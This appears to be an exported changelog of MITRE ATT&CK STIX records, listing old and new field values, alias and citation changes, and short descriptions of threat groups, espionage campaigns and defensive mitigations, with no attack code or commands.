| external_references[5]['source_name'] | Novetta Winnti April 2015 | Kaspersky Winnti April 2013 |
| external_references[5]['description'] | Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017. | Kaspersky Lab's Global Research and Analysis Team. (2013, April 11). Winnti. More than just a game. Retrieved February 8, 2017. |
| external_references[5]['url'] | http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf | https://securelist.com/winnti-more-than-just-a-game/37029/ |
| external_references[6]['source_name'] | 401 TRG Winnti Umbrella May 2018 | Novetta Winnti April 2015 |
| external_references[6]['description'] | Hegel, T. (2018, May 3). Burning Umbrella: An Intelligence Report on the Winnti Umbrella and Associated State-Sponsored Attackers. Retrieved July 8, 2018. | Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017. |
| external_references[6]['url'] | https://401trg.github.io/pages/burning-umbrella.html | http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf |
| external_references[7]['source_name'] | Symantec Suckfly March 2016 | Kaspersky Winnti June 2015 |
| external_references[7]['description'] | DiMaggio, J.. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016. | Tarakanov, D. (2015, June 22). Games are over: Winnti is now targeting pharmaceutical companies. Retrieved January 14, 2016. |
| external_references[7]['url'] | http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates | https://securelist.com/games-are-over/70991/ |
| x_mitre_version | 1.1 | 1.2 |

| Description |
|---|
| [menuPass](https://attack.mitre.org/groups/G0045) is a threat group that has been active since at least 2006. Individual members of [menuPass](https://attack.mitre.org/groups/G0045) are known to have acted in association with the Chinese Ministry of State Security's (MSS) Tianjin State Security Bureau and worked for the Huaying Haitai Science and Technology Development Company.(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018) [menuPass](https://attack.mitre.org/groups/G0045) has targeted healthcare, defense, aerospace, finance, maritime, biotechnology, energy, and government sectors globally, with an emphasis on Japanese organizations. In 2016 and 2017, the group is known to have targeted managed IT service providers (MSPs), manufacturing and mining companies, and a university.(Citation: Palo Alto menuPass Feb 2017)(Citation: Crowdstrike CrowdCast Oct 2013)(Citation: FireEye Poison Ivy)(Citation: PWC Cloud Hopper April 2017)(Citation: FireEye APT10 April 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-11 14:01:44.538000+00:00 | 2022-07-20 20:07:40.169000+00:00 |
| external_references[1]['source_name'] | menuPass | HOGFISH |
| external_references[1]['description'] | (Citation: Palo Alto menuPass Feb 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018) | (Citation: Accenture Hogfish April 2018) |
| external_references[2]['source_name'] | Cicada | POTASSIUM |
| external_references[2]['description'] | (Citation: Symantec Cicada November 2020) | (Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018) |
| external_references[3]['source_name'] | POTASSIUM | Stone Panda |
| external_references[3]['description'] | (Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018) | (Citation: Palo Alto menuPass Feb 2017)(Citation: Accenture Hogfish April 2018)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)(Citation: Symantec Cicada November 2020) |
| external_references[4]['source_name'] | Stone Panda | APT10 |
| external_references[4]['description'] | (Citation: Palo Alto menuPass Feb 2017)(Citation: Accenture Hogfish April 2018)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)(Citation: Symantec Cicada November 2020) | (Citation: Palo Alto menuPass Feb 2017)(Citation: Accenture Hogfish April 2018)(Citation: FireEye APT10 Sept 2018)(Citation: DOJ APT10 Dec 2018)(Citation: Symantec Cicada November 2020) |
| external_references[5]['source_name'] | APT10 | menuPass |
| external_references[5]['description'] | (Citation: Palo Alto menuPass Feb 2017)(Citation: Accenture Hogfish April 2018)(Citation: FireEye APT10 Sept 2018)(Citation: DOJ APT10 Dec 2018)(Citation: Symantec Cicada November 2020) | (Citation: Palo Alto menuPass Feb 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018) |
| external_references[8]['source_name'] | HOGFISH | Cicada |
| external_references[8]['description'] | (Citation: Accenture Hogfish April 2018) | (Citation: Symantec Cicada November 2020) |
| external_references[9]['source_name'] | DOJ APT10 Dec 2018 | Accenture Hogfish April 2018 |
| external_references[9]['description'] | United States District Court Southern District of New York (USDC SDNY) . (2018, December 17). United States of America v. Zhu Hua and Zhang Shilong. Retrieved April 17, 2019. | Accenture Security. (2018, April 23). Hogfish Redleaves Campaign. Retrieved July 2, 2018. |
| external_references[9]['url'] | https://www.justice.gov/opa/pr/two-chinese-hackers-associated-ministry-state-security-charged-global-computer-intrusion | https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf |
| external_references[10]['source_name'] | District Court of NY APT10 Indictment December 2018 | Crowdstrike CrowdCast Oct 2013 |
| external_references[10]['description'] | US District Court Southern District of New York. (2018, December 17). United States v. Zhu Hua Indictment. Retrieved December 17, 2020. | Crowdstrike. (2013, October 16). CrowdCasts Monthly: You Have an Adversary Problem. Retrieved March 1, 2017. |
| external_references[10]['url'] | https://www.justice.gov/opa/page/file/1122671/download | https://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem |
| external_references[11]['source_name'] | Palo Alto menuPass Feb 2017 | FireEye APT10 April 2017 |
| external_references[11]['description'] | Miller-Osborn, J. and Grunzweig, J.. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017. | FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017. |
| external_references[11]['url'] | http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/ | https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html |
| external_references[12]['source_name'] | Crowdstrike CrowdCast Oct 2013 | FireEye Poison Ivy |
| external_references[12]['description'] | Crowdstrike. (2013, October 16). CrowdCasts Monthly: You Have an Adversary Problem. Retrieved March 1, 2017. | FireEye. (2014). POISON IVY: Assessing Damage and Extracting Intelligence. Retrieved November 12, 2014. |
| external_references[12]['url'] | https://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf |
| external_references[13]['source_name'] | FireEye Poison Ivy | FireEye APT10 Sept 2018 |
| external_references[13]['description'] | FireEye. (2014). POISON IVY: Assessing Damage and Extracting Intelligence. Retrieved November 12, 2014. | Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018. |
| external_references[13]['url'] | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf | https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html |
| external_references[14]['source_name'] | PWC Cloud Hopper April 2017 | Palo Alto menuPass Feb 2017 |
| external_references[14]['description'] | PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017. | Miller-Osborn, J. and Grunzweig, J.. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017. |
| external_references[14]['url'] | https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf | http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/ |
| external_references[15]['source_name'] | FireEye APT10 April 2017 | PWC Cloud Hopper April 2017 |
| external_references[15]['description'] | FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017. | PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017. |
| external_references[15]['url'] | https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html | https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf |
| external_references[17]['source_name'] | Accenture Hogfish April 2018 | DOJ APT10 Dec 2018 |
| external_references[17]['description'] | Accenture Security. (2018, April 23). Hogfish Redleaves Campaign. Retrieved July 2, 2018. | United States District Court Southern District of New York (USDC SDNY) . (2018, December 17). United States of America v. Zhu Hua and Zhang Shilong. Retrieved April 17, 2019. |
| external_references[17]['url'] | https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf | https://www.justice.gov/opa/pr/two-chinese-hackers-associated-ministry-state-security-charged-global-computer-intrusion |
| external_references[18]['source_name'] | FireEye APT10 Sept 2018 | District Court of NY APT10 Indictment December 2018 |
| external_references[18]['description'] | Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018. | US District Court Southern District of New York. (2018, December 17). United States v. Zhu Hua Indictment. Retrieved December 17, 2020. |
| external_references[18]['url'] | https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html | https://www.justice.gov/opa/page/file/1122671/download |

| Description |
|---|
| [Dragonfly 2.0](https://attack.mitre.org/groups/G0074) is a suspected Russian group that has targeted government entities and multiple U.S. critical infrastructure sectors since at least December 2015. (Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) There is debate over the extent of overlap between [Dragonfly 2.0](https://attack.mitre.org/groups/G0074) and [Dragonfly](https://attack.mitre.org/groups/G0035), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY ) |

| Description for G0035 Dragonfly |
|---|
| [Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been attributed to Russia's Federal Security Service (FSB) Center 16.(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) Active since at least 2010, [Dragonfly](https://attack.mitre.org/groups/G0035) has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Gigamon Berserk Bear October 2021)(Citation: CISA AA20-296A Berserk Bear December 2020)(Citation: Symantec Dragonfly 2.0 October 2017) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 20:07:00.932000+00:00 | 2022-05-11 14:00:00.188000+00:00 |
| revoked | False | True |
| external_references[1]['source_name'] | Dragonfly 2.0 | DYMALLOY |
| external_references[1]['description'] | (Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) (Citation: Fortune Dragonfly 2.0 Sept 2017) | (Citation: Dragos DYMALLOY ) |
| external_references[2]['source_name'] | IRON LIBERTY | Berserk Bear |
| external_references[2]['description'] | (Citation: Secureworks MCMD July 2019)(Citation: Secureworks IRON LIBERTY) | (Citation: Fortune Dragonfly 2.0 Sept 2017) |
| external_references[3]['source_name'] | DYMALLOY | IRON LIBERTY |
| external_references[3]['description'] | (Citation: Dragos DYMALLOY ) | (Citation: Secureworks MCMD July 2019)(Citation: Secureworks IRON LIBERTY) |
| external_references[4]['source_name'] | Berserk Bear | Dragonfly 2.0 |
| external_references[4]['description'] | (Citation: Fortune Dragonfly 2.0 Sept 2017) | (Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) (Citation: Fortune Dragonfly 2.0 Sept 2017) |
| external_references[5]['source_name'] | US-CERT TA18-074A | Dragos DYMALLOY |
| external_references[5]['description'] | US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018. | Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020. |
| external_references[5]['url'] | https://www.us-cert.gov/ncas/alerts/TA18-074A | https://www.dragos.com/threat/dymalloy/ |
| external_references[6]['source_name'] | Symantec Dragonfly Sept 2017 | Fortune Dragonfly 2.0 Sept 2017 |
| external_references[6]['description'] | Symantec Security Response. (2017, September 6). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017. | Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018. |
| external_references[6]['url'] | https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group | http://fortune.com/2017/09/06/hack-energy-grid-symantec/ |
| external_references[7]['source_name'] | Fortune Dragonfly 2.0 Sept 2017 | Secureworks MCMD July 2019 |
| external_references[7]['description'] | Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018. | Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020. |
| external_references[7]['url'] | http://fortune.com/2017/09/06/hack-energy-grid-symantec/ | https://www.secureworks.com/research/mcmd-malware-analysis |
| external_references[8]['source_name'] | Dragos DYMALLOY | Secureworks IRON LIBERTY |
| external_references[8]['description'] | Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020. | Secureworks. (n.d.). IRON LIBERTY. Retrieved October 15, 2020. |
| external_references[8]['url'] | https://www.dragos.com/threat/dymalloy/ | https://www.secureworks.com/research/threat-profiles/iron-liberty |
| external_references[9]['source_name'] | Secureworks MCMD July 2019 | Symantec Dragonfly Sept 2017 |
| external_references[9]['description'] | Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020. | Symantec Security Response. (2017, September 6). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017. |
| external_references[9]['url'] | https://www.secureworks.com/research/mcmd-malware-analysis | https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group |
| external_references[10]['source_name'] | Secureworks IRON LIBERTY | US-CERT TA18-074A |
| external_references[10]['description'] | Secureworks. (n.d.). IRON LIBERTY. Retrieved October 15, 2020. | US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018. |
| external_references[10]['url'] | https://www.secureworks.com/research/threat-profiles/iron-liberty | https://www.us-cert.gov/ncas/alerts/TA18-074A |
| Description |
|---|
| [CostaRicto](https://attack.mitre.org/groups/G0132) is a suspected hacker-for-hire cyber espionage campaign that has targeted multiple industries worldwide since at least 2019. [CostaRicto](https://attack.mitre.org/groups/G0132)'s targets, a large portion of which are financial institutions, are scattered across Europe, the Americas, Asia, Australia, and Africa, with a large concentration in South Asia.(Citation: BlackBerry CostaRicto November 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | True | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 20:41:50.305000+00:00 | 2022-10-12 19:18:38.430000+00:00 |
| Description |
|---|
| [Dust Storm](https://attack.mitre.org/groups/G0031) is a threat group that has targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries. (Citation: Cylance Dust Storm) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | True | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2019-03-22 20:14:29.575000+00:00 | 2022-09-29 21:28:39.974000+00:00 |
| external_references[2]['description'] | Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017. | Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021. |
| external_references[2]['url'] | https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf | https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf |
| Description |
|---|
| [Frankenstein](https://attack.mitre.org/groups/G0101) is a campaign carried out between January and April 2019 by unknown threat actors. The campaign name comes from the actors' ability to piece together several unrelated components.(Citation: Talos Frankenstein June 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | True | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-05-26 19:57:42.132000+00:00 | 2022-09-19 21:44:20.477000+00:00 |
| Description |
|---|
| [Honeybee](https://attack.mitre.org/groups/G0072) is a campaign led by an unknown actor that targets humanitarian aid organizations and has been active in Vietnam, Singapore, Argentina, Japan, Indonesia, and Canada. It has been an active operation since August of 2017 and as recently as February 2018. (Citation: McAfee Honeybee) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | True | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-07-23 19:48:35.981000+00:00 | 2022-09-19 20:08:40.243000+00:00 |
| Description |
|---|
| [Night Dragon](https://attack.mitre.org/groups/G0014) is a campaign name for activity involving a threat group that has conducted activity originating primarily in China. (Citation: McAfee Night Dragon) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | True | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-12 22:12:11.717000+00:00 | 2022-09-22 20:54:08.611000+00:00 |
| Description |
|---|
| [Operation Wocao](https://attack.mitre.org/groups/G0116) described activities carried out by a China-based cyber espionage adversary. [Operation Wocao](https://attack.mitre.org/groups/G0116) targeted entities within the government, managed service providers, energy, health care, and technology sectors across several countries, including China, France, Germany, the United Kingdom, and the United States. [Operation Wocao](https://attack.mitre.org/groups/G0116) used similar TTPs and tools to APT20, suggesting a possible overlap.(Citation: FoxIT Wocao December 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | True | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-20 00:14:14.838000+00:00 | 2022-10-12 19:17:31.924000+00:00 |
| external_references[2]['url'] | https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf | https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf |
| Description |
|---|
| Operation [Sharpshooter](https://attack.mitre.org/groups/G0104) is the name of a cyber espionage campaign discovered in October 2018 targeting nuclear, defense, energy, and financial companies. Though overlaps between this adversary and [Lazarus Group](https://attack.mitre.org/groups/G0032) have been noted, definitive links have not been established.(Citation: McAfee Sharpshooter December 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | True | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-30 03:08:44.808000+00:00 | 2022-09-26 22:11:36.315000+00:00 |
| Description |
|---|
| [C0010](https://attack.mitre.org/campaigns/C0010) was a cyber espionage campaign conducted by UNC3890 that targeted Israeli shipping, government, aviation, energy, and healthcare organizations. Security researchers assess UNC3890 conducts operations in support of Iranian interests, and noted several limited technical connections to Iran, including PDB strings and Farsi language artifacts. [C0010](https://attack.mitre.org/campaigns/C0010) began by at least late 2020, and was still ongoing as of mid-2022.(Citation: Mandiant UNC3890 Aug 2022) |
| Description |
|---|
| [C0011](https://attack.mitre.org/campaigns/C0011) was a suspected cyber espionage campaign conducted by [Transparent Tribe](https://attack.mitre.org/groups/G0134) that targeted students at universities and colleges in India. Security researchers noted this campaign against students was a significant shift from [Transparent Tribe](https://attack.mitre.org/groups/G0134)'s historic targeting of Indian government, military, and think tank personnel, and assessed it was still ongoing as of July 2022.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022) |
| Description |
|---|
| [C0015](https://attack.mitre.org/campaigns/C0015) was a ransomware intrusion during which the unidentified attackers used [Bazar](https://attack.mitre.org/software/S0534), [Cobalt Strike](https://attack.mitre.org/software/S0154), and [Conti](https://attack.mitre.org/software/S0575), along with other tools, over a 5-day period. Security researchers assessed the actors likely used the widely-circulated [Conti](https://attack.mitre.org/software/S0575) ransomware playbook based on the observed pattern of activity and operator errors.(Citation: DFIR Conti Bazar Nov 2021) |
| Description |
|---|
| [CostaRicto](https://attack.mitre.org/campaigns/C0004) was a suspected hacker-for-hire cyber espionage campaign that targeted multiple industries worldwide, with a large number being financial institutions. [CostaRicto](https://attack.mitre.org/campaigns/C0004) actors targeted organizations in Europe, the Americas, Asia, Australia, and Africa, with a large concentration in South Asia (especially India, Bangladesh, and Singapore), using custom malware, open source tools, and a complex network of proxies and SSH tunnels.(Citation: BlackBerry CostaRicto November 2020) |
| Description |
|---|
| [Frankenstein](https://attack.mitre.org/campaigns/C0001) was described by security researchers as a highly-targeted campaign conducted by moderately sophisticated and highly resourceful threat actors in early 2019. The unidentified actors primarily relied on open source tools, including [Empire](https://attack.mitre.org/software/S0363). The campaign name refers to the actors' ability to piece together several unrelated open-source tool components.(Citation: Talos Frankenstein June 2019) |
| Description |
|---|
| [FunnyDream](https://attack.mitre.org/campaigns/C0007) was a suspected Chinese cyber espionage campaign that targeted government and foreign organizations in Malaysia, the Philippines, Taiwan, Vietnam, and other parts of Southeast Asia. Security researchers linked the [FunnyDream](https://attack.mitre.org/campaigns/C0007) campaign to possible Chinese-speaking threat actors through the use of the [Chinoxy](https://attack.mitre.org/software/S1041) backdoor and noted infrastructure overlap with the TAG-16 threat group.(Citation: Bitdefender FunnyDream Campaign November 2020)(Citation: Kaspersky APT Trends Q1 2020)(Citation: Recorded Future Chinese Activity in Southeast Asia December 2021) |
| Description |
|---|
| [Night Dragon](https://attack.mitre.org/campaigns/C0002) was a cyber espionage campaign that targeted oil, energy, and petrochemical companies, along with individuals and executives in Kazakhstan, Taiwan, Greece, and the United States. The unidentified threat actors searched for information related to oil and gas field production systems, financials, and collected data from SCADA systems. Based on the observed techniques, tools, and network activities, security researchers assessed the campaign involved a threat group based in China.(Citation: McAfee Night Dragon) |
| Description |
|---|
| [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012) was a cyber espionage campaign targeting technology and manufacturing companies in East Asia, Western Europe, and North America since at least 2019. Security researchers noted the goal of [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), which was still ongoing as of May 2022, was likely the theft of proprietary information, research and development documents, source code, and blueprints for various technologies. Researchers assessed [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012) was conducted by actors affiliated with [Winnti Group](https://attack.mitre.org/groups/G0044), [APT41](https://attack.mitre.org/groups/G0096), and BARIUM.(Citation: Cybereason OperationCuckooBees May 2022) |
| Description |
|---|
| [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) was a long-standing persistent cyber espionage campaign that targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries. By 2015, the [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) threat actors shifted from government and defense-related intelligence targets to Japanese companies or Japanese subdivisions of larger foreign organizations supporting Japan's critical infrastructure, including electricity generation, oil and natural gas, finance, transportation, and construction.(Citation: Cylance Dust Storm) [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) threat actors also began to use Android backdoors in their operations by 2015, with all identified victims at the time residing in Japan or South Korea.(Citation: Cylance Dust Storm) |
| Description |
|---|
| [Operation Honeybee](https://attack.mitre.org/campaigns/C0006) was a campaign that targeted humanitarian aid and inter-Korean affairs organizations from at least late 2017 through early 2018. [Operation Honeybee](https://attack.mitre.org/campaigns/C0006) initially targeted South Korea, but expanded to include Vietnam, Singapore, Japan, Indonesia, Argentina, and Canada. Security researchers assessed the threat actors were likely Korean speakers based on metadata used in both lure documents and executables, and named the campaign "Honeybee" after the author name discovered in malicious Word documents.(Citation: McAfee Honeybee) |
| Description |
|---|
| [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013) was a global cyber espionage campaign that targeted nuclear, defense, government, energy, and financial companies, with many located in Germany, Turkey, the United Kingdom, and the United States. Security researchers noted the campaign shared many similarities with previous [Lazarus Group](https://attack.mitre.org/groups/G0032) operations, including fake job recruitment lures and shared malware code.(Citation: McAfee Sharpshooter December 2018)(Citation: Bleeping Computer Op Sharpshooter March 2019)(Citation: Threatpost New Op Sharpshooter Data March 2019) |
| Description |
|---|
| [Operation Spalax](https://attack.mitre.org/campaigns/C0005) was a campaign that primarily targeted Colombian government organizations and private companies, particularly those associated with the energy and metallurgical industries. The [Operation Spalax](https://attack.mitre.org/campaigns/C0005) threat actors distributed commodity malware and tools using generic phishing topics related to COVID-19, banking, and law enforcement action. Security researchers noted indicators of compromise and some infrastructure overlaps with other campaigns dating back to April 2018, including at least one separately attributed to [APT-C-36](https://attack.mitre.org/groups/G0099), but identified enough differences to report this as separate, unattributed activity.(Citation: ESET Operation Spalax Jan 2021) |
| Description |
|---|
| [Operation Wocao](https://attack.mitre.org/campaigns/C0014) was a cyber espionage campaign that targeted organizations around the world, including in Brazil, China, France, Germany, Italy, Mexico, Portugal, Spain, the United Kingdom, and the United States. The suspected China-based actors compromised government organizations and managed service providers, as well as aviation, construction, energy, finance, health care, insurance, offshore engineering, software development, and transportation companies.(Citation: FoxIT Wocao December 2019) Security researchers assessed the [Operation Wocao](https://attack.mitre.org/campaigns/C0014) actors used similar TTPs and tools as APT20, suggesting a possible overlap. [Operation Wocao](https://attack.mitre.org/campaigns/C0014) was named after an observed command line entry by one of the threat actors, possibly out of frustration from losing webshell access.(Citation: FoxIT Wocao December 2019) |
| Description |
|---|
| Configure features related to account use like login attempt lockouts, specific login times, etc. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2019-06-13 16:07:21.233000+00:00 | 2022-10-21 15:52:18.525000+00:00 |
| Description |
|---|
| Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-11-19 20:44:07.442000+00:00 | 2022-10-21 15:52:12.722000+00:00 |
| Description |
|---|
| Use capabilities to prevent successful credential access by adversaries, including blocking forms of credential dumping. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-31 13:09:22.442000+00:00 | 2022-10-21 15:51:57.176000+00:00 |
| Description |
|---|
| Block execution of code on a system through application control and/or script blocking. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-20 20:11:42.195000+00:00 | 2022-02-28 19:50:41.210000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| Use two or more pieces of evidence to authenticate to a system, such as a username and password in addition to a token from a physical smart card or token generator. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
